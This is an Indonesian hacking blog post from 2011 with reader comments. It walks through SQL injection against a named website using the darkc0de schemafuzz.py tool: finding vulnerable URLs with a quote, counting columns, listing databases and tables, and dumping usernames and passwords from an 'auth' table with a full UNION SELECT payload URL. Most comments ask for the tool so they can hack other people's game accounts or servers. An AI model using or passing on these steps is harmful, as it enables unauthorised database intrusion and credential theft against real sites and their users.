Searching...
Selasa, 18 Januari 2011
17.39
26 komentar

SQL Injection

Home » Hacking » SQL Injection
Tools ini berfungsi untuk hack SQL Injection yang di buat dengan bahasa Python....
Ingat Jangan digunakan untu, hal yang tidak baik.....
Utk pengguna windoss, install dlu interpreter python, coz bhs ini ga default ada… (ckckckc… windos… windos… repot emang). Utk linux, langsung pake aja… ^^
1. Cari dlu web yg vul terhadap SQL injection. “Gimana cara-nya mas?” tenang, blum selesai. Oke, bug SQL injc biasa-nya terdapat pada halaman news,berita, atau sejenis nya. Utk mengetahui web tsb vul atau tidak, coba gunakan single quote (’) di akhir url. Contoh: http://target.com/news.php?id=2′ <<>
2. Target kita kali ini adalah www.rayner.com/products.php?id=22 . setelah kita mendapatkan target yang vulnerable, yang harus kita cari pertama kali adalah jumlah column
a. cari jumlah column dan magic number,..
command :
schemafuzz.py – -findcol -u
Nanti akan muncul seperti ini:
disitu dapat kita lihat bahwa jumlah column nya adalah 10 dimulai dari angka 0, dan yang null adalah column ke 1,..
3. cari database name,..
command :
schemafuzz.py – -dbs -u
disini link url nya kita copykan dari out put langkah diatas yaitu darkc0de url. Yang di blok adalah nama Database-nya.
setelah kita mendapat kan nama databasenya sekarang kita liat schema table dan colum yang ada dalam database tersebut,
4. lihat table dan column,
command :
schemafuzz.py – -schema -u
jangan lupa untuk menambahkan nama database nya di depan url dengan command -D namatadabase
hasil nya akan terlihat seperti ini,

digambar terlihat jelas semua nama table dan columnnya, langkah terakhir adalah melihat semua data yang ada dalam table dan column tersebut, disini kita akan melihat data yang ada dalam table auth dengan nama column name,pass (Table No. 1)
5. lihat data dalam collum!
command :
schemafuzz.py – -dump -u
jangan lupa didepan url kita tambahkan nama database, nama table, dan nama column, dengan command -D namadatabe -T namatable -C namacolumn. Contoh : # python schemafuzz.py –dump -u http://www.rayner.com/products.php?id=22+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5,6,7,8,9 -D db2889_rayner_en -T auth -C name,pass
Yang di block adalah username dan password ^^

Sumber : Binus....
Diposting oleh di 17.39
Label:
Share This To :

26 komentar :

  1. Anonim3 Februari 2011 pukul 13.04

    kk ini cara Hack Data Base buat apa
    Kalau buat RF giman caranya

    BalasHapus
  2. Rizki Els8 Februari 2011 pukul 16.06

    buat hack acoount orang bisa.. tapi klo kamu bisa..
    emangnya Rf nya mau di apain....

    BalasHapus
  3. A tanali13 Juli 2011 pukul 16.53

    kk ajarin hack id Rf orang
    mohon pencerahan nya"

    BalasHapus
  4. Anonim18 Agustus 2011 pukul 16.34

    kasian yang punya kalau di hack

    BalasHapus
  5. Anonim18 Agustus 2011 pukul 20.13

    OM buat hack server RF gimana? Bagi tutor lengkapnya kalo emang anda bisa, gw kesulitan neh.. RF private aja

    BalasHapus
  6. Anonim27 Agustus 2011 pukul 00.12

    INI BISA BUAT HACK DATA BASE RF GK, SOALNYA GW KESE BANGET AMA GM NYA SOK BANGET PLISS GW MOHON

    BalasHapus
  7. Anonim27 Oktober 2011 pukul 06.20

    OM avi.... cara dapet TOOLS ny gimana??? rf anek kena hack nich... kalo bisa tolong ajarkan cara hack database rf secara lengkap ya....

    kirim ke email aj....

    Email: noelz_saputra@yahoo.co.id

    BalasHapus
  8. Anonim9 November 2011 pukul 15.45

    wah si noelz ksni kwkwwkk

    BalasHapus
  9. rifqi16 November 2011 pukul 18.35

    bagi link nya donk bang..

    trus sama cara edit data base bang..

    bagi tutorial nya aja bang..

    BalasHapus
  10. MichaeL19 November 2011 pukul 23.33

    bagi link nya donk kk

    BalasHapus
  11. Anonim12 Januari 2012 pukul 13.14

    bagi linkya donk

    BalasHapus
  12. Anonim14 Februari 2012 pukul 23.14

    wah mantap kali nih om

    BalasHapus
  13. Anonim10 Maret 2012 pukul 22.05

    lumayan nih
    nambah2 ilmu hahaha

    BalasHapus
  14. RyanJoko13 Maret 2012 pukul 14.12

    engga ngerti ane

    BalasHapus
  15. Variant-Arus17 Maret 2012 pukul 17.47

    kk bagi link buat hack database dong !!! aku mau hack database orang luar yang rese

    BalasHapus
  16. Variant-Arus17 Maret 2012 pukul 17.52

    caranya download gmna itu kasih link di Email aku iia !!!

    ryzq_ari@gmail.com

    BalasHapus
  17. Anonim24 Juni 2012 pukul 18.55

    bagi link bang..
    wa minta..
    mau belajar...

    blegion@ymail.com

    BalasHapus
  18. Yanseku1 September 2012 pukul 23.47

    bisa buat hack vtc rab online ga?
    oh iya nama toolsnya apa? saya minta dong, tolong kirimkan toolsnya ke deejayradhitya@gmail.com

    BalasHapus
  19. Anonim2 September 2012 pukul 11.11

    bagi link nya donk bank kirim abiyyuhakam@yahoo.co.id

    BalasHapus
  20. cipto23 November 2012 pukul 00.46

    sempurna

    BalasHapus
  21. cipto24 November 2012 pukul 22.16

    kk aku mau nanya nih!
    link normal contoh diatas kan http://target.com/news.php.
    trus yang aku ngak ngerti dari mana dapat tambahan linknya ?id=2′...madsudnya linknya jadi seperti ini
    http://target.com/news.php?id=2′

    dari mana kk?
    tolong kasih tau kk

    plissss

    BalasHapus
  22. Anonim5 Desember 2012 pukul 06.19

    ini kan menggunakan linux

    BalasHapus
  23. Rizki Els2 Januari 2013 pukul 02.07

    Itu semua program aplikasi linux, untuk windows ada keterangan di atas nama aplikasinya SQL injection dan kawan mohon dibaca lagi kawan2. untuk Link Download cari di source web resmi aja pasti ada yg terbaru supaya Update.. Thanks Visit My blog ^_^

    BalasHapus
  24. Anonim13 Januari 2013 pukul 16.47

    ane kurang faham gan, ane pakai win 7 !!

    BalasHapus
  25. Unknown29 Februari 2016 pukul 13.55

    yaudah om ente aja yg nge hack tar inbox username ama pass nya :v

    BalasHapus
    Balasan
    1. Rizki Els1 Maret 2016 pukul 22.49

      mohon maaf gan posting ini sudah ga work. karena semakin kesini pemrograman berbasis database/SQL sudah semakin baik. walaupun masih ada bug2 yang sering ditemui.

      Hapus

Langganan: Posting Komentar ( Atom )
 
Back to top!